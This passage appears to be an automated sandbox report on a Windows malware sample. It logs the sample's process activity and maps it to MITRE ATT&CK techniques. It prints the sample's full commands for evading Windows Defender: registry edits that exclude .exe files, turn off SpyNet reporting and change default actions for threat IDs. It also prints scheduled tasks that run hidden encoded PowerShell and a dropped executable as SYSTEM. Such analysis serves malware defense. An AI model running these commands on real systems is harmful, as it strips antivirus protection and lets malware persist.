Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041584A SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041585C SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gyzdoohkp" /sc once /st 07:29:03 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gyzdoohkp" /sc once /st 07:29:03 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gYzDOohkP"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gYzDOohkP"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bltLOfaNnqcomuNOFZ" /SC once /ST 16:17:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe\" 6Q /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies Group Policy settings
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		11
Scheduled Task/Job		11
Process Injection		2
Masquerading		1
Input Capture		12
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts21
Command and Scripting Interpreter		Boot or Logon Initialization Scripts11
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
